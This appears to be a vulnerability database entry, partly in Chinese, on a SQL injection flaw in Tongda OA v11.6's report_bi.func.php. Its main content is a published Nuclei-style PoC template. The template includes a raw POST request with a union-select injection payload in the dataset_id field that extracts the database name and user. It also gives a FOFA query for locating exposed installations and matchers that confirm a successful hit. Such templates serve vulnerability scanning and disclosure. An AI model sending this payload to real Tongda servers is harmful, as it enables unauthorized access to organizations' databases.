tongda-report-func-sqli: Tongda OA v11.6 report_bi.func.php - SQL injection

日期: 2025-08-01 | 影响软件: Tongda OA | POC: 已公开

漏洞描述

Tongda OA v11.6 report_bi.func.php has a SQL injection vulnerability, and attackers can obtain database information through the vulnerability.

PoC代码[已公开]

id: tongda-report-func-sqli

info:
  name: Tongda OA v11.6 report_bi.func.php - SQL injection
  author: SleepingBag945
  severity: high
  description: |
    Tongda OA v11.6 report_bi.func.php has a SQL injection vulnerability, and attackers can obtain database information through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  classification:
    cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: tongda2000
    product: office_anywhere
    fofa-query: app="TDXK-通达OA"
  tags: tongda,sqli,vuln

http:
  - raw:
      - |
        POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"root@'
          - '"para":'
          - '"td_oa"'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b57b52b5f004c981e08fd7de79a20ac1400772b443c09d0f616d30b893c8ec1202204760ae465d16c39357adccf207d2c3094e9deb32f500666ce3deff8796fb6333:922c64590222798bb761d5b6d8e72950

相关漏洞推荐